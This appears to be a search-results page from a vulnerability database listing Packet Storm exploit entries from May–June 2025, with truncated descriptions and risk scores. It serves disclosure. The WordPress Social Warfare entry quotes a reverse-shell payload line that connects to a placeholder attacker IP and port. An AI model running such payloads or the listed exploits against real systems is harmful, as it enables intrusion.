
50738 matches found

Packet Storm • added 2025/06/09 12:0 a.m. • 103 views

📄 TightVNC 2.8.83 Control Pipe Manipulation

TightVNC version 2.8.83 suffers from a control pipe manipulation vulnerability. Exploit Title: TightVNC 2.8.83 - Control Pipe Manipulation Date: 06/09/2025 Exploit Author: Ionut Zevedei [email protected] Exploit Repository: https://github.com/zeved/CVE-2024-42049-PoC Vendor Homepage:...

CVSS 9.1 | AI score 7.3 | EPSS 0.02147
Exploits: 3

Packet Storm • added 2025/06/09 12:0 a.m. • 93 views

📄 Remote for Mac 2025.7 Unauthenticated Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint. When authentication is disabled on the target system, it allows attackers to execute arbitrary AppleScript commands,...

AI score 9.4
Exploits: 0

Packet Storm • added 2025/06/09 12:0 a.m. • 239 views

📄 RAD FT Dell Firmware A00-00 Privilege Escalation

RAD FT Firmware versions A00-00 Build WP0000051154 and prior are susceptible to a privilege escalation vulnerability due to a failure to properly filter the user-supplied input through the .NET Profiler. Exploit name: RAD FT Dell Firmware Download link:...

AI score 7.5
Exploits: 0

Packet Storm • added 2025/06/09 12:0 a.m. • 86 views

📄 FUDForum 3.2.0 Command Injection

FUDForum version 3.2.0 suffers from a code injection vulnerability. Exploit Title: FUDForum 3.2.0 Command Injection Authenticated Exploit Author: tmrswrr Vendor Homepage: http://fudforum.org/ Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum3.2.0.zip/download Version : 3.2.0...

AI score 7.8
Exploits: 0

Packet Storm • added 2025/06/09 12:0 a.m. • 92 views

📄 vBulletin 4.x movepm PHP Object Injection

In vBulletin 4.x, a flawed security patch from 2014 has introduced a new post-auth PHP object injection vector by replacing serialize with jsonencode — ironically making it possible to get vBulletin to sign attacker-controlled base64-encoded payloads, potentially allowing users to perform remote...

AI score 8.6
Exploits: 0

Packet Storm • added 2025/06/06 12:0 a.m. • 148 views

📄 Microsoft Windows Server 2025 JScript Engine Remote Code Execution

This proof of concept exploits a use-after-free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution. !/usr/bin/env python3 Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution...

CVSS 7.5 | AI score 8.1 | EPSS 0.21562
Exploits: 7

Packet Storm • added 2025/06/06 12:0 a.m. • 119 views

📄 macOS / iOS Local Privilege Escalation

This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary, creates an admin user, and installs a persistent LaunchDaemon backdoor...

CVSS 7.8 | AI score 8.2 | EPSS 0.18668
Exploits: 5

Packet Storm • added 2025/06/06 12:0 a.m. • 107 views

📄 HRM 1.0 2025 Cross Site Scripting

HRM version 1.0 2025 suffers from a cross site scripting vulnerability. Titles: HRM-1.0 2025 Cross-site scripting reflected Author: nu11secur1ty Date: 06/06/2025 Vendor: https://github.com/oretnom23 Software:...

AI score 6.6
Exploits: 0

Packet Storm • added 2025/06/06 12:0 a.m. • 86 views

📄 Apache Tomcat 10.1.39 Denial of Service

Apache Tomcat version 10.1.39 suffers from a denial of service vulnerability. Exploit Title: Apache Tomcat 10.1.39 - Denial of Service DOS Author: Abdualhadi khalifa CVE: CVE-2025-31650 import httpx import asyncio import random import urllib.parse import sys import socket from colorama import ini...

CVSS 7.5 | AI score 7.3 | EPSS 0.66933
Exploits: 5

Packet Storm • added 2025/06/05 12:0 a.m. • 89 views

📄 ABB Cylon Aspect 3.08.04 DeploySource Unauthenticated Remote Code Execution

ABB Cylon Aspect BMS/BAS version 3.08.04 is vulnerable to a critical flaw in the AuthenticatedHttpServlet within its application server, enabling remote attackers to bypass authentication by setting the Host: 127.0.0.1 header. This deceives the server into processing requests as if they originate...

AI score 8.3
Exploits: 0

Packet Storm • added 2025/06/04 12:0 a.m. • 74 views

📄 Udev Persistence

This Metasploit module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk. It will be executed with root privileges every time a network interface other than l0 comes up. This module requires Metasploit: https://metasploit.com/download Current source:...

AI score 7.5
Exploits: 0

Packet Storm • added 2025/06/04 12:0 a.m. • 112 views

📄 Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM, tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated access to an administrator web API endpoint, which allows for code execution via expression language...

CVSS 8.8 | AI score 8.8 | EPSS 0.99891
Exploits: 10

Packet Storm • added 2025/06/03 12:0 a.m. • 93 views

📄 Adapt CMS 3.0.3 Cross Site Scripting

Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability in the Send Message functionality. Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...

AI score 6.5
Exploits: 0

Packet Storm • added 2025/06/03 12:0 a.m. • 174 views

📄 Adapt CMS 3.0.3 Remote Shell Upload

Adapt CMS version 3.0.3 suffers from a remote shell upload vulnerability. Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE 1:...

AI score 7.5
Exploits: 0

Packet Storm • added 2025/06/03 12:0 a.m. • 94 views

📄 ERPNext 15.53.1 Cross Site Scripting

ERPNext version 15.53.1 suffers from multiple persistent cross site scripting vulnerabilities. An authenticated user can inject malicious JavaScript into the userimage field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient...

AI score 6.8
Exploits: 0

Packet Storm • added 2025/06/03 12:0 a.m. • 97 views

📄 Adapt CMS 3.0.3 Cross Site Scripting

Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability via file upload. Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Stored XSS via...

AI score 6.6
Exploits: 0

Packet Storm • added 2025/06/03 12:0 a.m. • 260 views

📄 PSF Request Library Credential Leak

The PSF requests library leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. The PSF requests library https://github.com/psf/requests & https://pypi.org/project/requests/ leaks .netrc credentials to third parties due to incorrect URL processing und...

CVSS 5.3 | AI score 7.3 | EPSS 0.00846
Exploits: 1

Packet Storm • added 2025/06/03 12:0 a.m. • 88 views

📄 Adapt CMS 3.0.3 Insecure Direct Object Reference / Incorrect Authorization

Adapt CMS version 3.0.3 suffers from an insecure direct object reference vulnerability that allows for privilege escalation. Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...

AI score 7.4
Exploits: 0

Packet Storm • added 2025/06/03 12:0 a.m. • 113 views

📄 WordPress Social Warfare 3.5.2 Remote Code Execution

Proof of concept remote code execution exploit for WordPress Social Warfare plugin versions 3.5.2 and below. !/usr/bin/env python3 Exploit Title: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin system"bash -c \"bash -i & /dev/tcp/ATTACKERIP/LISTENPORT 0&1\""' with...

CVSS 6.1 | AI score 8.4 | EPSS 0.73543
Exploits: 18

Packet Storm • added 2025/06/03 12:0 a.m. • 134 views

📄 Microsoft Windows Registry Protection Removal

Thanks to OFFREG.dll, every unprivileged user can copy the registry tree HKEYCURRENTUSER except of course the registry keys where the policies are stored to an offline registry hive ntuser.man and thus get rid of any restrictions previously imposed via user group policies after logging off and on...

AI score 7.3
Exploits: 0

Packet Storm • added 2025/06/03 12:0 a.m. • 178 views

📄 CloudClassroom PHP Project 1.0 SQL Injection

CloudClassroom PHP Project version 1.0 suffers from a time-based blind remote SQL Injection vulnerability. Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project:...

CVSS 7.3 | AI score 8.8 | EPSS 0.00995
Exploits: 3

Packet Storm • added 2025/06/02 12:0 a.m. • 109 views

📄 Motivian Content Management System 41.0.0 Arbitrary File Upload

Motivian Content Management System version 41.0.0 suffers from an arbitrary file upload vulnerability. CVE-2025-29093-Arbitrary-File-Upload This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29093: Arbitrary File Upload This...

CVSS 8.2 | AI score 7.5 | EPSS 0.00511
Exploits: 2

Packet Storm • added 2025/06/02 12:0 a.m. • 92 views

📄 WatchGuard 12.11 Memory Corruption

WatchGuard version 12.11 memory corruption proof of concept exploit. ─$ cat watchguard12.11postauthclibof.py !/usr/bin/env python3 watchguard12.11postauthclibof.py this is a poc for post authorized stack overflow found in 'cli' binary. Tue Feb 4 06:12:20 EST 2025 by code610 More: networkdevice=...

AI score 7.6
Exploits: 0

Packet Storm • added 2025/06/02 12:0 a.m. • 90 views

📄 Motivian Content Management System 41.0.0 Cross Site Scripting

Motivian Content Management System version 41.0.0 suffers from multiple cross site scripting vulnerabilities. CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29094:...

CVSS 6.1 | AI score 6.8 | EPSS 0.00311
Exploits: 3

Packet Storm • added 2025/05/30 12:0 a.m. • 93 views

📄 Unifiedtransform 2.x Student Editor Missing Authorization

Unifiedtransform version 2.x allows any user to access and modify student records via the /students/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify student records via the /students/edit/id...

CVSS 6.5 | AI score 7.3 | EPSS 0.0032
Exploits: 3

Packet Storm • added 2025/05/30 12:0 a.m. • 126 views

📄 Unifiedtransform 2.x Course Editor Missing Authorization

Unifiedtransform version 2.x allows any user to access and modify course records via the /course/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify course details via the /course/edit/id endpoints...

CVSS 6.5 | AI score 7.3 | EPSS 0.00345
Exploits: 2

Packet Storm • added 2025/05/30 12:0 a.m. • 88 views

📄 RustFly 2.0.0 Remote Code Execution

RustFly version 2.0.0 contains a critical vulnerability in its remote input processing layer that allows unauthenticated attackers to achieve remote code execution. RustFly v2.0.0- Remote Code Execution RCE Exploit Title: RustFly v2.0.0- Remote Code Execution RCE Date: 2025-05-29 Exploit Author:...

AI score 8.3
Exploits: 0

Packet Storm • added 2025/05/29 12:0 a.m. • 83 views

📄 Campcodes Online Hospital Management System 1.0 SQL Injection

Campcodes Online Hospital Management System version 1.0 suffers from a remote SQL injection vulnerability. Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection Google Dork: N/A Exploit Author: Carine Constantino Vendor Homepage: https://www.campcodes.com Software Link:...

CVSS 9.8 | AI score 8.5 | EPSS 0.00758
Exploits: 3

Packet Storm • added 2025/05/29 12:0 a.m. • 107 views

📄 Kion Exchange Programs Software 1.21.9092.29966 Cross Site Scripting

Kion Exchange Programs Software versions 1.21.9092.29966 and below suffer from a cross site scripting vulnerability. Exploit Title: Kion Exchange Programs Software Reflected XSS CVE: CVE-2024-7130 PoC-Date: 2025-05-28 Exploit Author: Kutay ERGEN Vendor Homepage: https://www.kionexchangeprograms.c...

CVSS 5.5 | AI score 6.6 | EPSS 0.0035
Exploits: 1

Packet Storm • added 2025/05/29 12:0 a.m. • 86 views

📄 Fortra GoAnywhere MFT 7.4.1 Authentication Bypass

Fortra GoAnywhere MFT version 7.4.1 proof of concept authentication bypass exploit. !/usr/bin/env python3 -- coding: utf-8 -- Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass Date: 2025-05-25 Exploit Author: @ibrahimsql Exploit Author's github: https://github.com/ibrahimsql Vend...

CVSS 9.8 | AI score 7.7 | EPSS 0.95086
Exploits: 8

Packet Storm • added 2025/05/29 12:0 a.m. • 83 views

📄 Automic Agent 24.3.0 HF4 Privilege Escalation

Automic Agent version 24.3.0 HF4 suffers from a privilege escalation vulnerability. Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation Date: 26.05.2025 Exploit Author: Flora Schäfer Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation Version:...

CVSS 8.5 | AI score 7.6 | EPSS 0.00516
Exploits: 2

Packet Storm • added 2025/05/29 12:0 a.m. • 93 views

📄 Windows File Explorer NTLM Hash Disclosure

Windows File Explorer on Microsoft Windows 11 23H2 proof of concept NTLM hash disclosure exploit. !/usr/bin/env python3 Exploit Title: Windows File Explorer Windows 11 23H2 - NTLM Hash Disclosure Exploit Author: Mohammed Idrees Banyamer Twitter/GitHub:https://github.com/mbanyamer Date: 2025-05-27...

CVSS 6.5 | AI score 7.2 | EPSS 0.25068
Exploits: 21

Packet Storm • added 2025/05/28 12:0 a.m. • 86 views

📄 Remote for Mac 2025.6 Unauthenticated Arbitrary Input

Remote for Mac version 2025.6 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-28 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...

AI score 7.8
Exploits: 0

Packet Storm • added 2025/05/28 12:0 a.m. • 117 views

📄 eCharge Hardy Barth cPH2 / cPP2 Charging Stations 2.2.0 Command Injection / Backdoor

eCharge Hardy Barth cPH2 and cPP2 Charging Stations version 2.2.0 suffer from missing authentication, OS command injection, backdoor user accounts, backdoor functionality, and hardcoded key vulnerabilities. SEC Consult Vulnerability Lab Security Advisory...

CVSS 8.1 | AI score 7.6 | EPSS 0.00962
Exploits: 1

Packet Storm • added 2025/05/28 12:0 a.m. • 209 views

📄 Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization

A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker to forge ViewState data. This can lead to unauthorized actions such as remote code execution. Both applications make use of a hardcoded machineKey in the IIS...

CVSS 9.8 | AI score 8.4 | EPSS 0.92727
Exploits: 6

Packet Storm • added 2025/05/28 12:0 a.m. • 115 views

📄 Frappe Framework 15.56.1 SQL Injection

Frappe Framework version 15.56.1 suffers from a remote SQL injection vulnerability. An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.getlist API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields...

AI score 8.5
Exploits: 0

Packet Storm • added 2025/05/27 12:0 a.m. • 91 views

📄 Remote for Mac 2025.6 Desktop Stream Disclosure

Remote for Mac version 2025.6 suffers from an unauthenticated desktop stream disclosure vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit Date: 2025-05-27 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...

AI score 7.6
Exploits: 0

Packet Storm • added 2025/05/27 12:0 a.m. • 96 views

📄 KRUKSTON BISTRO 1.0 SQL Injection

KRUKSTON BISTRO version 1.0 suffers from a remote SQL injection vulnerability. Titles: KRUKSTON-BISTRO-1.0 Multiple-SQLi Author: nu11secur1ty Date: 05/27/2025 Vendor: https://www.mayurik.com/ Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html Reference:...

AI score 8.5
Exploits: 0

Packet Storm • added 2025/05/27 12:0 a.m. • 104 views

📄 Remote for Mac 2025.6 Remote Code Execution

Remote for Mac version 2025.6 allows an unauthenticated remote attacker to achieve remote code execution by sending a crafted sequence of UDP packets that simulate keyboard input. Exploit Title: Remote for Mac 2025.6 - Remote Code Execution RCE Date: 2025-05-27 Exploit Author: Chokri Hammedi Vend...

AI score 8.4
Exploits: 0

Packet Storm • added 2025/05/26 12:0 a.m. • 85 views

📄 Remote for Windows 2024.15 Unauthenticated Arbitrary Input

Remote for Windows version 2024.15 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...

AI score 7.8
Exploits: 0

Packet Storm • added 2025/05/26 12:0 a.m. • 173 views

📄 Remote for Mac 2025.6 Remote Code Execution

Remote for Mac version 2025.6 suffers from an unauthenticated remote code execution vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link: https://cherpake.com/latest.php?os=ma...

AI score 8.6
Exploits: 0

Packet Storm • added 2025/05/26 12:0 a.m. • 99 views

📄 Java-springboot-codebase 1.1 Arbitrary File Read

Java-springboot-codebase version 1.1 suffers from an arbitrary file read vulnerability. Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read Google Dork: Date: 23/May/2025 Exploit Author: d3sca Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase Software Link:...

CVSS 8.7 | AI score 7.1 | EPSS 0.03847
Exploits: 13

Packet Storm • added 2025/05/26 12:0 a.m. • 87 views

📄 Remote for Windows 2024.15 Unquoted Service Path

Remote for Windows version 2024.15 suffers from an unquoted service path vulnerability. Exploit Title: Remote for Windows 2024.15 - Unquoted Service Path Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link: https://rs.ltd/latest.php?os=win Version: 2024.1...

AI score 7.5
Exploits: 0

Packet Storm • added 2025/05/26 12:0 a.m. • 83 views

📄 Remote for Mac 2025.6 Desktop Screenshot Capture

Remote for Mac version 2025.6 suffers from an unauthenticated desktop screenshot capture vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Screenshot Capture Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...

AI score 7.7
Exploits: 0

Packet Storm • added 2025/05/26 12:0 a.m. • 96 views

📄 WordPress User Registration and Membership 4.1.2 Authentication Bypass

WordPress User Registration and Membership plugin versions 4.1.2 and below suffer from an authentication bypass vulnerability. !/usr/bin/env python3 Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass Date: 2025-05-22 Exploit Author: Mohammed Idrees Banyam...

CVSS 8.1 | AI score 7.6 | EPSS 0.07248
Exploits: 4

Packet Storm • added 2025/05/26 12:0 a.m. • 99 views

📄 vBulletin replaceAdTemplate Remote Code Execution

vBulletin replaceAdTemplate remote code execution proof of concept exploit. Versions 5.0.0 through 6.0.3 are affected. ?php / ----------------------------------------------------------------- vBulletin replaceAdTemplate Remote Code Execution Vulnerability...

AI score 8.3
Exploits: 0

Packet Storm • added 2025/05/26 12:0 a.m. • 114 views

📄 Palo Alto 11.1.4-h7 Memory Corruption

Palo Alto version 11.1.4-h7 post authentication memory corruption proof of concept exploit. !/usr/bin/env python3 post auth cli memory corruption poc for paloalto 11.1.4-h7 19.01.2025 @ 00:23 postauth user in general 'admin' but we'll get back to that later ; can use cli to provide one of the...

AI score 7.8
Exploits: 0

Packet Storm • added 2025/05/26 12:0 a.m. • 88 views

📄 Grandstream GSD3710 1.0.11.13 Stack Buffer Overflow

Grandstream GSD3710 version 1.0.11.13 suffers from a stack buffer overflow vulnerability. !/usr/bin/env python3 Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow Google Dork: if applicable Date: 2025-05-23 Exploit Author: Pepelux user in ExploitDB Vendor Homepage:...

CVSS 9.8 | AI score 7.8 | EPSS 0.04418
Exploits: 2

Packet Storm • added 2025/05/23 12:0 a.m. • 86 views

📄 ABB Cylon Aspect 3.08.03 projectUpdateBSXFileProcess.php Remote Guest2Root

The ABB BMS/BAS controller is vulnerable to code execution and sudo misconfiguration flaws. An authenticated remote code execution vulnerability in the firmware update mechanism allows an attacker with valid credentials to escalate privileges and execute commands as root. The process involves...

AI score 8.7
Exploits: 0

Packet Storm • added 2025/05/23 12:0 a.m. • 79 views

📄 ABB Cylon Aspect 3.08.03 productRemovalUpdate.php Remote Code Execution

The ABB BMS/BAS controller suffers from an authenticated blind OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'instance' HTTP POST parameter called by the productRemovalUpdate.php script. The token key POST param needs to be se...

AI score 8.4
Exploits: 0

Total number of security vulnerabilities: 50738